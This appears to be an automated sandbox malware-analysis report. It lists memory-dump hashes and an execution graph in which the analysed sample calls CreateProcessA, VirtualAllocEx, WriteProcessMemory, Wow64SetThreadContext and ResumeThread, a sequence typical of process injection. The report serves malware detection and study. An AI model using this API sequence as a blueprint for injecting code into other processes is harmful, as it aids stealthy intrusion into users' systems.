                                                            • Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 55192774c0fca53e2952333be0b02d6150e85aab24660c359da9f282e5b0e6e9
                                                            • Instruction ID: d0bda43be9a0b40373426dc9d7418a1114cd154a6d26de857444dbcd39a849d4
                                                            • Opcode Fuzzy Hash: 55192774c0fca53e2952333be0b02d6150e85aab24660c359da9f282e5b0e6e9
                                                            • Instruction Fuzzy Hash: F02104317816118FC7169B2AC45852EB7A6FFC975A708947AE817CB394CF34CC02CB90
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ba90de30d4d3d7f5bec71e197d892c449deb84ee1bbdccd80ba62abaf42e5201
                                                            • Instruction ID: 6e4a12da848ae7100434b5b2d961416e6db01ce229caac49d045010b9e53b95f
                                                            • Opcode Fuzzy Hash: ba90de30d4d3d7f5bec71e197d892c449deb84ee1bbdccd80ba62abaf42e5201
                                                            • Instruction Fuzzy Hash: 63219075A001159FCF14DF38C840AEE37A5EB9D268B50C06DE94E9B244DB38EA43CBD2
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.4121791035.0000000002D4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D4D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_2d4d000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5932c9fed33bf4e82db0946ddb830f1b43e53e409c898a18a7acc43e8b3058aa
                                                            • Instruction ID: 8279c7f66bc1b118b0fd29c16abcf19eeb134ddfad847c634a0f33c3e10cfc35
                                                            • Opcode Fuzzy Hash: 5932c9fed33bf4e82db0946ddb830f1b43e53e409c898a18a7acc43e8b3058aa
                                                            • Instruction Fuzzy Hash: 4C212671604204DFDB14DF24D9C4B26BBA6FB88314F30C5ADE8494B352CB7AE846CA61
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b500ed7b1bdbe063565913cae71e6d112ba71ec1eaa97531c58ffaba8e9dce79
                                                            • Instruction ID: 4e1e90725edbe6d4244f9e459ec1b63b04ef4823ef1f2b0d700af24d78786520
                                                            • Opcode Fuzzy Hash: b500ed7b1bdbe063565913cae71e6d112ba71ec1eaa97531c58ffaba8e9dce79
                                                            • Instruction Fuzzy Hash: 0321FF316851489FCB029F24D848BAF3B62EB85319F009479F8068B354CB79CD61CBE1
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b788881af136e7e69e55028fae2f77415509d8864cdeee3b3b02b5888db6b4b4
                                                            • Instruction ID: eb66e21a25e8e55e4b55a57f1346c1d1a10201a05f79c817ded3ca369b2da238
                                                            • Opcode Fuzzy Hash: b788881af136e7e69e55028fae2f77415509d8864cdeee3b3b02b5888db6b4b4
                                                            • Instruction Fuzzy Hash: 0A31C278E41208CFCB08DFA8E59489DBBF2FF49305B2090A9E819AB364D735AD45CF01
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: afa674f2c1038171f337ddedcdaa05ef862429139041b2b14c1df16a87f85e37
                                                            • Instruction ID: c2faab933e64ddfcdee8a8f27b55e83b9d2d59b89580d0d97a377c555903edc5
                                                            • Opcode Fuzzy Hash: afa674f2c1038171f337ddedcdaa05ef862429139041b2b14c1df16a87f85e37
                                                            • Instruction Fuzzy Hash: EE217A30E412489FDB05CFA5D964AEEBFB6EF48209F249469E411F62A1DB35D981CB20
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7ba6cad487bd780957d63c2fe879dbc61ef9f222517beaf271bcb0772236763d
                                                            • Instruction ID: 89be3ba2f993827c8b3296d5b01459fd68df37b23285d5f8d33524962c9a67e0
                                                            • Opcode Fuzzy Hash: 7ba6cad487bd780957d63c2fe879dbc61ef9f222517beaf271bcb0772236763d
                                                            • Instruction Fuzzy Hash: 6911AF72B802089BCB109E56D848BEEBBB6FB8C315F549029E916E7350DB71AC50CB90
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9d662a59273c463e482cbd4c1696ab31e4a95adfc0f5acd6654bbb58cb4eb831
                                                            • Instruction ID: 066e59a70a06c3a9a688f8eb09ee39563d748b3b93884b6aae16a778c439c572
                                                            • Opcode Fuzzy Hash: 9d662a59273c463e482cbd4c1696ab31e4a95adfc0f5acd6654bbb58cb4eb831
                                                            • Instruction Fuzzy Hash: F12138B0D002099FDB45DFA9D980A9EBFF2FB45304F10D5BAD018AB365EB385A458B81
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8666cf188e8c90a3ef8ceb1d73898de610201e58f29c50203390e46d72477e29
                                                            • Instruction ID: 8f40bc5d8a9ec67588f84fe6256980833eb209429da9080afb6e97bc73a75500
                                                            • Opcode Fuzzy Hash: 8666cf188e8c90a3ef8ceb1d73898de610201e58f29c50203390e46d72477e29
                                                            • Instruction Fuzzy Hash: 0F11A5357815159FC7159A2AD45893E77AAFFC579A7098478E817CB360CF21DC02CB90
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 000fff2a3fb0fd4b49046d6db8d31d6a57aea443e9c97cacda71868f1c7119ad
                                                            • Instruction ID: 63b87c4dfc3857e368254c2d5ad6361b6033f51060f72646502fa368795a660f
                                                            • Opcode Fuzzy Hash: 000fff2a3fb0fd4b49046d6db8d31d6a57aea443e9c97cacda71868f1c7119ad
                                                            • Instruction Fuzzy Hash: 3321F274D8420E8FCB00EFA9D8485EEBBF4EF09310F4055AAD805B3210EB345A95CBA1
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5138b9d3eb7cde8eb53e86b06b145d8849ae74a9ea9a69eb7b2bfc1edf2a1de9
                                                            • Instruction ID: 0c33b785909ec547f67408463e2d4686550b72c965fc000e7f8128bc60c7fe02
                                                            • Opcode Fuzzy Hash: 5138b9d3eb7cde8eb53e86b06b145d8849ae74a9ea9a69eb7b2bfc1edf2a1de9
                                                            • Instruction Fuzzy Hash: D7113A70D402099FDB45EFA9D580B9EBBF2FB44304F10D5B9D018AB365EB385E458B81
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.4121791035.0000000002D4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D4D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_2d4d000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                            • Instruction ID: 748a0a802c16e2067b7d0ba854356016e898f82f381fe2762a8f8a2994cca517
                                                            • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                            • Instruction Fuzzy Hash: F311BB75504284CFCB11CF10C9C4B16BBA2FB88318F24C6AED8494B352C73AE84ACB62
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4a16fe4eeb3cc152232500b484d3e1ab6a55837f732e22c28d7db68731211318
                                                            • Instruction ID: 5dd8f40ab3845535e4fdb6c24f719c4507db584225f062787903f36edeaad89e
                                                            • Opcode Fuzzy Hash: 4a16fe4eeb3cc152232500b484d3e1ab6a55837f732e22c28d7db68731211318
                                                            • Instruction Fuzzy Hash: 8001D432B801186BCB429E59D854BEF3BABEBC8751F54C02AF906D7280DE358D11DB94
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fd025ce7955f72e9a76363620ca8a458ae6789cf4ae2f192c700be6ddc6264fd
                                                            • Instruction ID: 45c2fe802ccbc900b45d74d9b3085b1a286a4e174f00e6f9269ec2e03c35a56f
                                                            • Opcode Fuzzy Hash: fd025ce7955f72e9a76363620ca8a458ae6789cf4ae2f192c700be6ddc6264fd
                                                            • Instruction Fuzzy Hash: B9F0F6317816144B87159A2F9458ABAB6DEEFC9A5D745907AE809C7361EF20CC03C380
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d8c996a6807720662ef3083f4b78ddbfb8802431589157c13e15f7f1de368606
                                                            • Instruction ID: cda51dfaf5335e48fd6ced13b1bf27cf0a6a988550bff8a941ccd1afd1a5737a
                                                            • Opcode Fuzzy Hash: d8c996a6807720662ef3083f4b78ddbfb8802431589157c13e15f7f1de368606
                                                            • Instruction Fuzzy Hash: 7601E574E0020AEFDB40DFA8E845AAEBBB1FB48304F408565E914B3350D7386E56DF92
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cebfdfe048716e4d8282409f82fb73c380dd559d662de6441eb9c11021ccd74e
                                                            • Instruction ID: b25c449287cfb457d2db0e8291424d2412ecfc337307517f6bf9d95cae056832
                                                            • Opcode Fuzzy Hash: cebfdfe048716e4d8282409f82fb73c380dd559d662de6441eb9c11021ccd74e
                                                            • Instruction Fuzzy Hash: D0E0D831E943578BC701E7F09C140FEBB349D92121B48455BC0A537050EB20225AC3A2
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ab83175bc5d23b5ae51e1abf94a950a73317b27adc236c87e95ac6507a01be51
                                                            • Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
                                                            • Opcode Fuzzy Hash: ab83175bc5d23b5ae51e1abf94a950a73317b27adc236c87e95ac6507a01be51
                                                            • Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f08b7cb697b6c1a766442961b07be80886f8de46347aed767dda5cf14b018a84
                                                            • Instruction ID: a89b1a515f428e25a9379ec662ece339dd943cb708f02a27934cea0ffb3c5db9
                                                            • Opcode Fuzzy Hash: f08b7cb697b6c1a766442961b07be80886f8de46347aed767dda5cf14b018a84
                                                            • Instruction Fuzzy Hash: 5CD02E3009470D0FC742B770ED0E3A17B0AEB80200F408A30940A0A32ADFADA88886A0
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 90dc5bdeac33a92cf6892b5fa27ff2c74660635540dbede9a587a01fe6ef2b93
                                                            • Instruction ID: 2c43c428a51ac28cbf2357a9624b031a5448ee8eeb2aa025678a9e69bcd05e71
                                                            • Opcode Fuzzy Hash: 90dc5bdeac33a92cf6892b5fa27ff2c74660635540dbede9a587a01fe6ef2b93
                                                            • Instruction Fuzzy Hash: A2D06735E8450DCBCF20DFA9E5984DCFB71EF59322F10543AD925A3251D63054A5CF11
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3a2d3c902dd9961ce61e56958a90f70bdf5122935909330f0f49f31c87385b02
                                                            • Instruction ID: f887ca1d4f4299e14d7fbd833e2e3160e883cf5357967e21bf640121f61b79c8
                                                            • Opcode Fuzzy Hash: 3a2d3c902dd9961ce61e56958a90f70bdf5122935909330f0f49f31c87385b02
                                                            • Instruction Fuzzy Hash: 1DD0173AB40008DFCB008F89E8408DDF7B6FB98221B448017E911A3220C6319825CB50
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 52bbe42c3c21e7f57ac6d650a3ed9b1a437a8c26f9e883e1a3ce4179adeb6e8b
                                                            • Instruction ID: f4f2ac9f69e7c72ac1c6ab269fbfa97e6761b247ea80902a40c4b1b5a6b736bd
                                                            • Opcode Fuzzy Hash: 52bbe42c3c21e7f57ac6d650a3ed9b1a437a8c26f9e883e1a3ce4179adeb6e8b
                                                            • Instruction Fuzzy Hash: 77C012305843084FC641FBA5ED45555771EE780204F408930900B0676DDFBD5C894A90
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4b29b1acc4ea4600fa75a1fba61ea9982ee45bf0f0dac0542d69a2a6d906a4c4
                                                            • Instruction ID: daa4e9c7bce39728dbd2d70621a38723ba1e3dd4ff1b61fd1343c001eac8417d
                                                            • Opcode Fuzzy Hash: 4b29b1acc4ea4600fa75a1fba61ea9982ee45bf0f0dac0542d69a2a6d906a4c4
                                                            • Instruction Fuzzy Hash: 2DC1BE75E00218CFDB54DFA5C984B9DBBB2AF89304F1081A9D809BB364DB359E85CF51
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: de1d84fc4102b108f9cadd34048b9caf139685bea1109e8a7fdccac88521e9bd
                                                            • Instruction ID: ef784e9c6c7ba38da961edcaa4c1cb076ab96068f579ab51458e31f1886a808a
                                                            • Opcode Fuzzy Hash: de1d84fc4102b108f9cadd34048b9caf139685bea1109e8a7fdccac88521e9bd
                                                            • Instruction Fuzzy Hash: 7E512470D41208CBDB04EFA9D5887EDBBB2BB88304F14E139E405BB694DB799985CF94
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dc284bdc69723e8e8f2295d829a8ef33f1ad00120cc70e5419263296f22972a6
                                                            • Instruction ID: 1aef0f33d5865430448d5450e5ef01c9fae1b8c41417aeb1ef1cba06fe6b322d
                                                            • Opcode Fuzzy Hash: dc284bdc69723e8e8f2295d829a8ef33f1ad00120cc70e5419263296f22972a6
                                                            • Instruction Fuzzy Hash: A9510370D81208CBDB14EFA8D5847EDBBB2FB48305F20E129E415BB695C7399982CF90
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.4122265630.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_2e10000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \;^q$\;^q$\;^q$\;^q
                                                            • API String ID: 0-3001612457
                                                            • Opcode ID: ed10988b7446d8871df9e8d10b9de468bac63f1b0f325a25a37f744f192e0238
                                                            • Instruction ID: 6897f68eba9113f53eaa5c9a06b63e127498fb641a9791ec5cc98bcc67caa160
                                                            • Opcode Fuzzy Hash: ed10988b7446d8871df9e8d10b9de468bac63f1b0f325a25a37f744f192e0238
                                                            • Instruction Fuzzy Hash: C8017C31B801159FCB6C8E2DC544A2577EFAF88A68725D5BAE446CF3B8DA31DC41C790

                                                            Execution Graph

                                                            Execution Coverage:9.6%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:82
                                                            Total number of Limit Nodes:2
                                                            execution_graph 37145 108b778 37146 108b787 37145->37146 37148 108b86a 37145->37148 37149 108b8a4 37148->37149 37150 108b881 37148->37150 37149->37146 37150->37149 37151 108baa8 GetModuleHandleW 37150->37151 37152 108bad5 37151->37152 37152->37146 37153 7b701c6 37154 7b701e9 37153->37154 37156 763ec47 WriteProcessMemory 37154->37156 37157 763ec48 WriteProcessMemory 37154->37157 37155 7b70664 37156->37155 37157->37155 37088 7b70495 37089 7b70296 37088->37089 37090 7b706bf 37089->37090 37092 763ec47 WriteProcessMemory 37089->37092 37093 763ec48 WriteProcessMemory 37089->37093 37091 7b702b7 37092->37091 37093->37091 37094 7b70585 37095 7b70592 37094->37095 37097 7b70500 37094->37097 37103 763e670 37095->37103 37107 763e678 37095->37107 37096 7b70a55 37097->37096 37111 763e5c3 37097->37111 37115 763e5c8 37097->37115 37098 7b7072b 37104 763e675 Wow64SetThreadContext 37103->37104 37106 763e705 37104->37106 37106->37097 37108 763e6bd Wow64SetThreadContext 37107->37108 37110 763e705 37108->37110 37110->37097 37112 763e608 ResumeThread 37111->37112 37114 763e639 37112->37114 37114->37098 37116 763e608 ResumeThread 37115->37116 37118 763e639 37116->37118 37118->37098 37158 7b70143 37162 763eed0 37158->37162 37166 763eecf 37158->37166 37163 763ef59 CreateProcessA 37162->37163 37165 763f11b 37163->37165 37167 763ef59 37166->37167 37167->37167 37168 763f0be CreateProcessA 37167->37168 37169 763f11b 37168->37169 37170 7b705c2 37174 763eb80 37170->37174 37178 763eb88 37170->37178 37171 7b705e0 37175 763ebc8 VirtualAllocEx 37174->37175 37177 763ec05 37175->37177 37177->37171 37179 763ebc8 VirtualAllocEx 37178->37179 37181 763ec05 37179->37181 37181->37171 37075 7b703a0 37076 7b703a9 37075->37076 37080 763ec47 37076->37080 37084 763ec48 37076->37084 37077 7b7019b 37081 763ec90 WriteProcessMemory 37080->37081 37083 763ece7 37081->37083 37083->37077 37085 763ec90 WriteProcessMemory 37084->37085 37087 763ece7 37085->37087 37087->37077 37133 7b70760 37137 763ed38 37133->37137 37141 763ed37 37133->37141 37134 7b7069a 37138 763ed83 ReadProcessMemory 37137->37138 37140 763edc7 37138->37140 37140->37134 37142 763ed83 ReadProcessMemory 37141->37142 37144 763edc7 37142->37144 37144->37134 37119 7b706ff 37120 7b70705 37119->37120 37122 763e5c3 ResumeThread 37120->37122 37123 763e5c8 ResumeThread 37120->37123 37121 7b7072b 37122->37121 37123->37121 37124 7b7027f 37125 7b70285 37124->37125 37127 763ec47 WriteProcessMemory 37125->37127 37128 763ec48 WriteProcessMemory 37125->37128 37126 7b702b7 37126->37126 37127->37126 37128->37126 37129 7b705fc 37131 763e670 Wow64SetThreadContext 37129->37131 37132 763e678 Wow64SetThreadContext 37129->37132 37130 7b70616 37131->37130 37132->37130

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 450 4ff1709-4ff17a7 GetCurrentProcess 454 4ff17a9-4ff17af 450->454 455 4ff17b0-4ff17e4 GetCurrentThread 450->455 454->455 456 4ff17ed-4ff1821 GetCurrentProcess 455->456 457 4ff17e6-4ff17ec 455->457 459 4ff182a-4ff1842 456->459 460 4ff1823-4ff1829 456->460 457->456 471 4ff1845 call 4ff20d1 459->471 472 4ff1845 call 4ff1cf0 459->472 460->459 462 4ff184b-4ff187a GetCurrentThreadId 464 4ff187c-4ff1882 462->464 465 4ff1883-4ff18e5 462->465 464->465 471->462 472->462
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32 ref: 04FF1796
                                                            • GetCurrentThread.KERNEL32 ref: 04FF17D3
                                                            • GetCurrentProcess.KERNEL32 ref: 04FF1810
                                                            • GetCurrentThreadId.KERNEL32 ref: 04FF1869
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1806001613.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_4ff0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID: Current$ProcessThread
                                                            • String ID:
                                                            • API String ID: 2063062207-0
                                                            • Opcode ID: e2432c7b9e06c886c74c74e777f863215653e43c81424fe013f6929ea624d9b8
                                                            • Instruction ID: 0e77a983648be040e039c6aae0cb65e6cf07a3594ec7cf90912a80922aedfa72
                                                            • Opcode Fuzzy Hash: e2432c7b9e06c886c74c74e777f863215653e43c81424fe013f6929ea624d9b8
                                                            • Instruction Fuzzy Hash: 375175B4900249CFEB14DFA9DA48BDEBBF1EF48304F208469D019A7361DB35A945CF66

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 473 4ff1718-4ff17a7 GetCurrentProcess 477 4ff17a9-4ff17af 473->477 478 4ff17b0-4ff17e4 GetCurrentThread 473->478 477->478 479 4ff17ed-4ff1821 GetCurrentProcess 478->479 480 4ff17e6-4ff17ec 478->480 482 4ff182a-4ff1842 479->482 483 4ff1823-4ff1829 479->483 480->479 494 4ff1845 call 4ff20d1 482->494 495 4ff1845 call 4ff1cf0 482->495 483->482 485 4ff184b-4ff187a GetCurrentThreadId 487 4ff187c-4ff1882 485->487 488 4ff1883-4ff18e5 485->488 487->488 494->485 495->485
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32 ref: 04FF1796
                                                            • GetCurrentThread.KERNEL32 ref: 04FF17D3
                                                            • GetCurrentProcess.KERNEL32 ref: 04FF1810
                                                            • GetCurrentThreadId.KERNEL32 ref: 04FF1869
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1806001613.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_4ff0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID: Current$ProcessThread
                                                            • String ID:
                                                            • API String ID: 2063062207-0
                                                            • Opcode ID: 79df4513585366ef98dbf4c3d8c0a92ed154da7d9667bbffc60e11a62d27aa75
                                                            • Instruction ID: f6371d56511fabecc3b5ad27524209d60629c5a48938ec0f378b2dba08252c82
                                                            • Opcode Fuzzy Hash: 79df4513585366ef98dbf4c3d8c0a92ed154da7d9667bbffc60e11a62d27aa75
                                                            • Instruction Fuzzy Hash: 8B5167B4900209CFDB14DFAADA48BDEBBF1EF48314F208469D419A7360D735A945CF66

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 685 763eed0-763ef65 687 763ef67-763ef71 685->687 688 763ef9e-763efbe 685->688 687->688 689 763ef73-763ef75 687->689 693 763efc0-763efca 688->693 694 763eff7-763f026 688->694 691 763ef77-763ef81 689->691 692 763ef98-763ef9b 689->692 695 763ef83 691->695 696 763ef85-763ef94 691->696 692->688 693->694 697 763efcc-763efce 693->697 704 763f028-763f032 694->704 705 763f05f-763f119 CreateProcessA 694->705 695->696 696->696 698 763ef96 696->698 699 763eff1-763eff4 697->699 700 763efd0-763efda 697->700 698->692 699->694 702 763efde-763efed 700->702 703 763efdc 700->703 702->702 706 763efef 702->706 703->702 704->705 707 763f034-763f036 704->707 716 763f122-763f1a8 705->716 717 763f11b-763f121 705->717 706->699 708 763f059-763f05c 707->708 709 763f038-763f042 707->709 708->705 711 763f046-763f055 709->711 712 763f044 709->712 711->711 713 763f057 711->713 712->711 713->708 727 763f1aa-763f1ae 716->727 728 763f1b8-763f1bc 716->728 717->716 727->728 729 763f1b0 727->729 730 763f1be-763f1c2 728->730 731 763f1cc-763f1d0 728->731 729->728 730->731 732 763f1c4 730->732 733 763f1d2-763f1d6 731->733 734 763f1e0-763f1e4 731->734 732->731 733->734 735 763f1d8 733->735 736 763f1f6-763f1fd 734->736 737 763f1e6-763f1ec 734->737 735->734 738 763f214 736->738 739 763f1ff-763f20e 736->739 737->736 741 763f215 738->741 739->738 741->741
                                                            APIs
                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0763F106
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1807209948.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7630000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID: CreateProcess
                                                            • String ID:
                                                            • API String ID: 963392458-0
                                                            • Opcode ID: 55f93d321bf59cbd76211ad7581757931ee455c4c3dc1fc16b4a963e838a442a
